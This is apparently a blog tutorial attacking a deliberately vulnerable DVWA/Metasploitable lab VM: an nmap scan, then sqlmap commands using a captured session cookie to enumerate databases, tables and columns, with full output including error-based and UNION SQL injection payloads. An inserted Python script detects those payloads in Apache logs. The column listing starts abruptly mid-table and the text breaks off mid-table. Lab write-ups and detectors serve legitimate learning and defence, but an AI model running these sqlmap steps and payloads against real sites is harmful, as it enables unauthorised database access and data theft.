Saturday, March 22, 2014

METASPLOIT DVWA GNU LINUX IN VIRTUALBOX



root@bt:/pentest/database/sqlmap# nmap 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-26 21:54 WIT
Nmap scan report for 192.168.56.101
Host is up (0.00046s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown


With the port scan complete, the next step is to enumerate the databases behind the DVWA SQL injection page with a command like the one below. It needs two values:
=>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#
the DVWA address shown in the browser, noted earlier
=>security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab
the cookie captured with the Burp Suite proxy, also noted earlier

When sqlmap asks about the redirection, select 1 ([1] Follow the redirection, the default) to view the databases as a whole.


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" --dbs

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:46:43

[03:46:43] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[03:46:43] [INFO] resuming injection data from session file
[03:46:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:46:43] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---

[03:46:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:46:43] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[03:46:43] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 03:46:43
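The two payloads sqlmap reported above are also what a defender finds in the web server's access log. As an added example (not part of the original post, nor sqlmap's or DVWA's code), this Python script parses Apache combined-format lines, URL-decodes each query parameter, expands the MySQL hex literals sqlmap uses as markers (0x3a6b6b6d3a is ':kkm:') and flags the indicators present in those payloads; the log lines, the client IP 192.168.56.1 and the user-agent strings are constructed.

```python
"""Flag sqlmap-style SQL injection attempts in Apache access logs.

Added example for this post, not sqlmap's or DVWA's code. The payloads are the
two sqlmap reported against DVWA's 'id' parameter; the log lines, client IP
192.168.56.1 and user-agent strings are constructed sample data.
"""
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# MySQL hex string literal, e.g. 0x3a6b6b6d3a -> ':kkm:'
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

# Indicators drawn from the two injection payloads sqlmap reported above.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # MySQL error-based duplicate-key trick: FLOOR(RAND(0)*2) combined with GROUP BY
    "error_based_floor_rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"\bINFORMATION_SCHEMA\.", re.I),
    # Trailing tautology sqlmap appends to keep the original quoting balanced: 'vtwl'='vtwl
    "quoted_tautology": re.compile(r"'(\w+)'\s*=\s*'\1"),
}


def decode_hex_literals(text):
    """Replace every 0x... literal that decodes to printable ASCII with its text."""
    def repl(match):
        digits = match.group(1)
        if len(digits) % 2:
            return match.group(0)
        try:
            decoded = bytes.fromhex(digits).decode("ascii")
        except UnicodeDecodeError:
            return match.group(0)
        return decoded if decoded.isprintable() else match.group(0)
    return HEX_LITERAL.sub(repl, text)


def analyze_request(path):
    """Return one finding per query parameter whose decoded value matches an indicator."""
    findings = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = decode_hex_literals(value)
        hits = [key for key, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({"param": name, "indicators": hits, "decoded": decoded})
    return findings


def scan_log(lines):
    """Return one alert per log line whose request (or user agent) looks like SQL injection."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not a combined-format line; a real deployment would count these
        findings = analyze_request(m["path"])
        # Weak on its own (the UA is trivially changed) but cheap corroboration.
        if "sqlmap" in m["ua"].lower():
            findings.append({"param": None, "indicators": ["sqlmap_user_agent"], "decoded": m["ua"]})
        if findings:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "path": urlsplit(m["path"]).path,
                           "findings": findings})
    return alerts


def _sample_line(query, ua, status="200"):
    """Build a constructed log line; the payload is URL-encoded as the server would log it."""
    path = "/dvwa/vulnerabilities/sqli/?" + quote(query, safe="=&")
    return (f'192.168.56.1 - - [26/Oct/2012:21:58:03 +0700] "GET {path} HTTP/1.1" '
            f'{status} 4567 "-" "{ua}"')


ERROR_BASED = ("id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,"
               "(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,"
               "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
               " AND 'vtwl'='vtwl&Submit=Submit")
UNION_BASED = ("id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,"
               "0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit")
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/16.0"

SAMPLE_LOG = [
    _sample_line("id=1&Submit=Submit", BROWSER_UA),  # legitimate lookup, no alert
    _sample_line(ERROR_BASED, "sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)"),
    _sample_line(UNION_BASED, BROWSER_UA),  # same tool, forged user agent
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["ts"], alert["path"])
        for f in alert["findings"]:
            print("   ", f["param"], f["indicators"])
            print("    decoded:", f["decoded"][:120])
```

The decoded markers (':kkm:' and ':tbt:') are the delimiters sqlmap wraps around extracted data so it can find it in the error page, which is why the hex literals recur in every payload of a run.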

Continue with the command below to find out which tables the tikiwiki database contains; again select 1 ([1] Follow the redirection, the default) to view the tables as a whole:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" -D tikiwiki --tables

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:51:21

[03:51:22] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[03:51:22] [INFO] resuming injection data from session file
[03:51:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:51:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---

[03:51:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:51:22] [INFO] fetching tables for database: tikiwiki
Database: tikiwiki
[194 tables]
+------------------------------------+
| galaxia_activities                 |
| galaxia_activity_roles             |
| galaxia_instance_activities        |
| galaxia_instance_comments          |
| galaxia_instances                  |
| galaxia_processes                  |
| galaxia_roles                      |
| galaxia_transitions                |
| galaxia_user_roles                 |
| galaxia_workitems                  |
| messu_archive                      |
| messu_messages                     |
| messu_sent                         |
| sessions                           |
| tiki_actionlog                     |
| tiki_article_types                 |
| tiki_articles                      |
| tiki_banners                       |
| tiki_banning                       |
| tiki_banning_sections              |
| tiki_blog_activity                 |
| tiki_blog_posts                    |
| tiki_blog_posts_images             |
| tiki_blogs                         |
| tiki_calendar_categories           |
| tiki_calendar_items                |
| tiki_calendar_locations            |
| tiki_calendar_roles                |
| tiki_calendars                     |
| tiki_categories                    |
| tiki_categorized_objects           |
| tiki_category_objects              |
| tiki_category_sites                |
| tiki_chart_items                   |
| tiki_charts                        |
| tiki_charts_rankings               |
| tiki_charts_votes                  |
| tiki_chat_channels                 |
| tiki_chat_messages                 |
| tiki_chat_users                    |
| tiki_comments                      |
| tiki_content                       |
| tiki_content_templates             |
| tiki_content_templates_sections    |
| tiki_cookies                       |
| tiki_copyrights                    |
| tiki_directory_categories          |
| tiki_directory_search              |
| tiki_directory_sites               |
| tiki_download                      |
| tiki_drawings                      |
| tiki_dsn                           |
| tiki_dynamic_variables             |
| tiki_eph                           |
| tiki_extwiki                       |
| tiki_faq_questions                 |
| tiki_faqs                          |
| tiki_featured_links                |
| tiki_file_galleries                |
| tiki_file_handlers                 |
| tiki_files                         |
| tiki_forum_attachments             |
| tiki_forum_reads                   |
| tiki_forums                        |
| tiki_forums_queue                  |
| tiki_forums_reported               |
| tiki_friends                       |
| tiki_friendship_requests           |
| tiki_galleries                     |
| tiki_galleries_scales              |
| tiki_games                         |
| tiki_group_inclusion               |
| tiki_history                       |
| tiki_hotwords                      |
| tiki_html_pages                    |
| tiki_html_pages_dynamic_zones      |
| tiki_images                        |
| tiki_images_data                   |
| tiki_integrator_reps               |
| tiki_integrator_rules              |
| tiki_language                      |
| tiki_languages                     |
| tiki_link_cache                    |
| tiki_links                         |
| tiki_live_support_events           |
| tiki_live_support_message_comments |
| tiki_live_support_messages         |
| tiki_live_support_modules          |
| tiki_live_support_operators        |
| tiki_live_support_requests         |
| tiki_logs                          |
| tiki_mail_events                   |
| tiki_mailin_accounts               |
| tiki_menu_languages                |
| tiki_menu_options                  |
| tiki_menus                         |
| tiki_minical_events                |
| tiki_minical_topics                |
| tiki_modules                       |
| tiki_newsletter_groups             |
| tiki_newsletter_subscriptions      |
| tiki_newsletters                   |
| tiki_newsreader_marks              |
| tiki_newsreader_servers            |
| tiki_object_ratings                |
| tiki_page_footnotes                |
| tiki_pages                         |
| tiki_pageviews                     |
| tiki_poll_objects                  |
| tiki_poll_options                  |
| tiki_polls                         |
| tiki_preferences                   |
| tiki_private_messages              |
| tiki_programmed_content            |
| tiki_quicktags                     |
| tiki_quiz_question_options         |
| tiki_quiz_questions                |
| tiki_quiz_results                  |
| tiki_quiz_stats                    |
| tiki_quiz_stats_sum                |
| tiki_quizzes                       |
| tiki_received_articles             |
| tiki_received_pages                |
| tiki_referer_stats                 |
| tiki_related_categories            |
| tiki_rss_feeds                     |
| tiki_rss_modules                   |
| tiki_score                         |
| tiki_search_stats                  |
| tiki_searchindex                   |
| tiki_searchsyllable                |
| tiki_searchwords                   |
| tiki_secdb                         |
| tiki_semaphores                    |
| tiki_sent_newsletters              |
| tiki_sessions                      |
| tiki_sheet_layout                  |
| tiki_sheet_values                  |
| tiki_sheets                        |
| tiki_shoutbox                      |
| tiki_shoutbox_words                |
| tiki_stats                         |
| tiki_structure_versions            |
| tiki_structures                    |
| tiki_submissions                   |
| tiki_suggested_faq_questions       |
| tiki_survey_question_options       |
| tiki_survey_questions              |
| tiki_surveys                       |
| tiki_tags                          |
| tiki_theme_control_categs          |
| tiki_theme_control_objects         |
| tiki_theme_control_sections        |
| tiki_topics                        |
| tiki_tracker_fields                |
| tiki_tracker_item_attachments      |
| tiki_tracker_item_comments         |
| tiki_tracker_item_fields           |
| tiki_tracker_items                 |
| tiki_tracker_options               |
| tiki_trackers                      |
| tiki_translated_objects            |
| tiki_untranslated                  |
| tiki_user_answers                  |
| tiki_user_answers_uploads          |
| tiki_user_assigned_modules         |
| tiki_user_bookmarks_folders        |
| tiki_user_bookmarks_urls           |
| tiki_user_mail_accounts            |
| tiki_user_menus                    |
| tiki_user_modules                  |
| tiki_user_notes                    |
| tiki_user_postings                 |
| tiki_user_preferences              |
| tiki_user_quizzes                  |
| tiki_user_taken_quizzes            |
| tiki_user_tasks                    |
| tiki_user_tasks_history            |
| tiki_user_votings                  |
| tiki_user_watches                  |
| tiki_userfiles                     |
| tiki_userpoints                    |
| tiki_users                         |
| tiki_users_score                   |
| tiki_webmail_contacts              |
| tiki_webmail_messages              |
| tiki_wiki_attachments              |
| tiki_zones                         |
| users_grouppermissions             |
| users_groups                       |
| users_objectpermissions            |
| users_permissions                  |
| users_usergroups                   |
| users_users                        |
+------------------------------------+

[03:51:22] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

Now we proceed to dump the columns: here we want to see the columns of the tables in tikiwiki. Do the same step as before, see the following:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" -D tikiwiki --columns
| name        | varchar(30)  |
| refresh     | int(6)       |
+-------------+--------------+

Database: tikiwiki
Table: tiki_galleries_scales
[2 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| galleryId | int(14) |
| scale     | int(11) |
+-----------+---------+

Database: tikiwiki
Table: sessions
[4 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| data      | text             |
| expireref | varchar(64)      |
| expiry    | int(11) unsigned |
| sesskey   | char(32)         |
+-----------+------------------+

Database: tikiwiki
Table: tiki_quiz_stats_sum
[6 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| avgavg     | decimal(5,2) |
| avgpoints  | decimal(5,2) |
| avgtime    | decimal(5,2) |
| quizId     | int(10)      |
| quizName   | varchar(255) |
| timesTaken | int(10)      |
+------------+--------------+

Database: tikiwiki
Table: tiki_charts_votes
[4 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| chartId   | int(14)     |
| itemId    | int(14)     |
| timestamp | int(14)     |
| user      | varchar(40) |
+-----------+-------------+

Database: tikiwiki
Table: tiki_newsletters
[12 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| allowAnySub  | char(1)      |
| allowUserSub | char(1)      |
| created      | int(14)      |
| description  | text         |
| editions     | int(10)      |
| frequency    | int(14)      |
| lastSent     | int(14)      |
| name         | varchar(200) |
| nlId         | int(12)      |
| unsubMsg     | char(1)      |
| users        | int(10)      |
| validateAddr | char(1)      |
+--------------+--------------+

Database: tikiwiki
Table: tiki_webmail_contacts
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| contactId | int(12)      |
| email     | varchar(250) |
| firstName | varchar(80)  |
| lastName  | varchar(80)  |
| nickname  | varchar(200) |
| user      | varchar(40)  |
+-----------+--------------+

Database: tikiwiki
Table: tiki_programmed_content
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| contentId   | int(8)  |
| data        | text    |
| pId         | int(8)  |
| publishDate | int(14) |
+-------------+---------+

Database: tikiwiki
Table: tiki_searchsyllable
[3 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| lastUpdated | int(11)     |
| lastUsed    | int(11)     |
| syllable    | varchar(80) |
+-------------+-------------+

Database: tikiwiki
Table: tiki_category_sites
[2 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| categId | int(10) |
| siteId  | int(14) |
+---------+---------+

Database: tikiwiki
Table: tiki_zones
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| zone   | varchar(40) |
+--------+-------------+

Database: tikiwiki
Table: tiki_faqs
[7 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| canSuggest  | char(1)      |
| created     | int(14)      |
| description | text         |
| faqId       | int(10)      |
| hits        | int(8)       |
| questions   | int(5)       |
| title       | varchar(200) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_chart_items
[9 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| average     | decimal(4,2) |
| chartId     | int(14)      |
| created     | int(14)      |
| description | text         |
| itemId      | int(14)      |
| points      | int(14)      |
| title       | varchar(250) |
| URL         | varchar(250) |
| votes       | int(14)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_user_preferences
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| prefName | varchar(40)  |
| user     | varchar(40)  |
| value    | varchar(250) |
+----------+--------------+

Database: tikiwiki
Table: tiki_surveys
[7 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| created     | int(14)      |
| description | text         |
| lastTaken   | int(14)      |
| name        | varchar(200) |
| status      | char(1)      |
| surveyId    | int(12)      |
| taken       | int(10)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_theme_control_objects
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| name   | varchar(250) |
| objId  | varchar(250) |
| theme  | varchar(250) |
| type   | varchar(250) |
+--------+--------------+

Database: tikiwiki
Table: messu_sent
[15 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| body         | text         |
| date         | int(14)      |
| hash         | varchar(32)  |
| isFlagged    | char(1)      |
| isRead       | char(1)      |
| isReplied    | char(1)      |
| msgId        | int(14)      |
| priority     | int(2)       |
| replyto_hash | varchar(32)  |
| subject      | varchar(255) |
| user         | varchar(40)  |
| user_bcc     | text         |
| user_cc      | text         |
| user_from    | varchar(40)  |
| user_to      | text         |
+--------------+--------------+

Database: tikiwiki
Table: tiki_untranslated
[3 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| id     | int(14)  |
| lang   | char(16) |
| source | tinyblob |
+--------+----------+

Database: tikiwiki
Table: tiki_search_stats
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| hits   | int(10)     |
| term   | varchar(50) |
+--------+-------------+

Database: tikiwiki
Table: tiki_dsn
[3 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| dsn    | varchar(255) |
| dsnId  | int(12)      |
| name   | varchar(200) |
+--------+--------------+

Database: tikiwiki
Table: tiki_banning
[13 columns]
+-----------+-------------------+
| Column    | Type              |
+-----------+-------------------+
| banId     | int(12)           |
| created   | int(14)           |
| date_from | timestamp         |
| date_to   | timestamp         |
| ip1       | char(3)           |
| ip2       | char(3)           |
| ip3       | char(3)           |
| ip4       | char(3)           |
| message   | text              |
| mode      | enum('user','ip') |
| title     | varchar(200)      |
| use_dates | char(1)           |
| user      | varchar(40)       |
+-----------+-------------------+

Database: tikiwiki
Table: tiki_preferences
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| name   | varchar(40) |
| value  | text        |
+--------+-------------+

Database: tikiwiki
Table: tiki_comments
[20 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| average        | decimal(8,4) |
| comment_rating | tinyint(2)   |
| commentDate    | int(14)      |
| data           | text         |
| hash           | varchar(32)  |
| hits           | int(8)       |
| in_reply_to    | varchar(250) |
| message_id     | varchar(250) |
| object         | varchar(255) |
| objectType     | varchar(32)  |
| parentId       | int(14)      |
| points         | decimal(8,2) |
| smiley         | varchar(80)  |
| summary        | varchar(240) |
| threadId       | int(14)      |
| title          | varchar(100) |
| type           | char(1)      |
| user_ip        | varchar(15)  |
| userName       | varchar(40)  |
| votes          | int(8)       |
+----------------+--------------+

Database: tikiwiki
Table: tiki_received_pages
[8 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| comment          | varchar(200) |
| data             | longblob     |
| description      | varchar(200) |
| pageName         | varchar(160) |
| receivedDate     | int(14)      |
| receivedFromSite | varchar(200) |
| receivedFromUser | varchar(200) |
| receivedPageId   | int(14)      |
+------------------+--------------+

Database: tikiwiki
Table: tiki_extwiki
[3 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| extwiki   | varchar(255) |
| extwikiId | int(12)      |
| name      | varchar(200) |
+-----------+--------------+

Database: tikiwiki
Table: tiki_rss_modules
[9 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| content     | longblob     |
| description | text         |
| lastUpdated | int(14)      |
| name        | varchar(30)  |
| refresh     | int(8)       |
| rssId       | int(8)       |
| showPubDate | char(1)      |
| showTitle   | char(1)      |
| url         | varchar(255) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_calendars
[13 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| calendarId         | int(14)       |
| created            | int(14)       |
| customcategories   | enum('n','y') |
| customlanguages    | enum('n','y') |
| customlocations    | enum('n','y') |
| customparticipants | enum('n','y') |
| custompriorities   | enum('n','y') |
| customsubscription | enum('n','y') |
| description        | varchar(255)  |
| lastmodif          | int(14)       |
| name               | varchar(80)   |
| personal           | enum('n','y') |
| user               | varchar(40)   |
+--------------------+---------------+

Database: tikiwiki
Table: tiki_live_support_events
[7 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| data      | text        |
| eventId   | int(14)     |
| reqId     | varchar(32) |
| senderId  | varchar(32) |
| seqId     | int(14)     |
| timestamp | int(14)     |
| type      | varchar(40) |
+-----------+-------------+

Database: tikiwiki
Table: tiki_blog_posts_images
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| data     | longblob    |
| filename | varchar(80) |
| filesize | int(14)     |
| filetype | varchar(80) |
| imgId    | int(14)     |
| postId   | int(14)     |
+----------+-------------+

Database: tikiwiki
Table: tiki_pages
[23 columns]
+-----------------+------------------+
| Column          | Type             |
+-----------------+------------------+
| cache           | longtext         |
| cache_timestamp | int(14)          |
| comment         | varchar(200)     |
| created         | int(14)          |
| creator         | varchar(200)     |
| data            | text             |
| description     | varchar(200)     |
| flag            | char(1)          |
| hits            | int(8)           |
| ip              | varchar(15)      |
| is_html         | tinyint(1)       |
| lang            | varchar(16)      |
| lastModif       | int(14)          |
| lockedby        | varchar(200)     |
| page_id         | int(14)          |
| page_size       | int(10) unsigned |
| pageName        | varchar(160)     |
| pageRank        | decimal(4,3)     |
| points          | int(8)           |
| user            | varchar(40)      |
| version         | int(8)           |
| votes           | int(8)           |
| wiki_cache      | int(10)          |
+-----------------+------------------+

Database: tikiwiki
Table: tiki_poll_objects
[3 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| catObjectId | int(11)      |
| pollId      | int(11)      |
| title       | varchar(255) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_forum_attachments
[11 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| attId    | int(14)      |
| created  | int(14)      |
| data     | longblob     |
| dir      | varchar(200) |
| filename | varchar(250) |
| filesize | int(12)      |
| filetype | varchar(250) |
| forumId  | int(14)      |
| path     | varchar(250) |
| qId      | int(14)      |
| threadId | int(14)      |
+----------+--------------+

Database: tikiwiki
Table: tiki_categories
[5 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| categId     | int(12)      |
| description | varchar(250) |
| hits        | int(8)       |
| name        | varchar(100) |
| parentId    | int(12)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_quizzes
[37 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| bAdditionalQuestions   | char(1)      |
| bDeleted               | char(1)      |
| bForum                 | char(1)      |
| bLimitQuestionsPerPage | char(1)      |
| bMultiSession          | char(1)      |
| bOnline                | char(1)      |
| bRandomQuestions       | char(1)      |
| canRepeat              | char(1)      |
| created                | int(14)      |
| description            | text         |
| expireDate             | int(14)      |
| immediateFeedback      | char(1)      |
| name                   | varchar(255) |
| nAuthor                | int(4)       |
| nCanRepeat             | tinyint(4)   |
| nLimitQuestionsPerPage | tinyint(4)   |
| nRandomQuestions       | tinyint(4)   |
| nVersion               | int(4)       |
| passingperct           | int(4)       |
| publishDate            | int(14)      |
| questionsPerPage       | int(4)       |
| quizId                 | int(10)      |
| sData                  | text         |
| sEpilogue              | text         |
| sForum                 | varchar(80)  |
| sGradingMethod         | varchar(80)  |
| showAnswers            | char(1)      |
| shuffleAnswers         | char(1)      |
| shuffleQuestions       | char(1)      |
| sPrologue              | text         |
| sPublishStats          | varchar(80)  |
| sShowCorrectAnswers    | varchar(80)  |
| sShowScore             | varchar(80)  |
| storeResults           | char(1)      |
| taken                  | int(10)      |
| timeLimit              | int(14)      |
| timeLimited            | char(1)      |
+------------------------+--------------+

Database: tikiwiki
Table: tiki_userpoints
[3 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| points | decimal(8,2) |
| user   | varchar(40)  |
| voted  | int(8)       |
+--------+--------------+

Database: tikiwiki
Table: tiki_user_answers
[4 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| optionId     | int(10) |
| questionId   | int(10) |
| quizId       | int(10) |
| userResultId | int(10) |
+--------------+---------+

Database: tikiwiki
Table: tiki_suggested_faq_questions
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| answer   | text        |
| created  | int(14)     |
| faqId    | int(10)     |
| question | text        |
| sfqId    | int(10)     |
| user     | varchar(40) |
+----------+-------------+

Database: tikiwiki
Table: tiki_integrator_reps
[9 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| cacheable   | char(1)      |
| css_file    | varchar(255) |
| description | text         |
| expiration  | int(11)      |
| name        | varchar(255) |
| path        | varchar(255) |
| repID       | int(11)      |
| start_page  | varchar(255) |
| visibility  | char(1)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_html_pages_dynamic_zones
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| content  | text        |
| pageName | varchar(40) |
| type     | char(2)     |
| zone     | varchar(80) |
+----------+-------------+

Database: tikiwiki
Table: tiki_minical_topics
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| data     | longblob     |
| filename | varchar(200) |
| filesize | varchar(200) |
| filetype | varchar(200) |
| isIcon   | char(1)      |
| name     | varchar(250) |
| path     | varchar(250) |
| topicId  | int(12)      |
| user     | varchar(40)  |
+----------+--------------+

Database: tikiwiki
Table: tiki_banners
[29 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| alt            | varchar(250) |
| bannerId       | int(12)      |
| clicks         | int(8)       |
| client         | varchar(200) |
| created        | int(14)      |
| fixedURLData   | varchar(255) |
| fri            | char(1)      |
| fromDate       | int(14)      |
| hourFrom       | varchar(4)   |
| hourTo         | varchar(4)   |
| HTMLData       | text         |
| imageData      | longblob     |
| imageName      | varchar(100) |
| imageType      | varchar(200) |
| impressions    | int(8)       |
| maxImpressions | int(8)       |
| mon            | char(1)      |
| sat            | char(1)      |
| sun            | char(1)      |
| textData       | text         |
| thu            | char(1)      |
| title          | varchar(255) |
| toDate         | int(14)      |
| tue            | char(1)      |
| url            | varchar(255) |
| useDates       | char(1)      |
| wed            | char(1)      |
| which          | varchar(50)  |
| zone           | varchar(40)  |
+----------------+--------------+

Database: tikiwiki
Table: tiki_related_categories
[2 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| categId   | int(10) |
| relatedTo | int(10) |
+-----------+---------+

Database: tikiwiki
Table: tiki_user_taken_quizzes
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| quizId | varchar(255) |
| user   | varchar(40)  |
+--------+--------------+

Database: tikiwiki
Table: tiki_users_score
[4 columns]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| event_id | char(40)  |
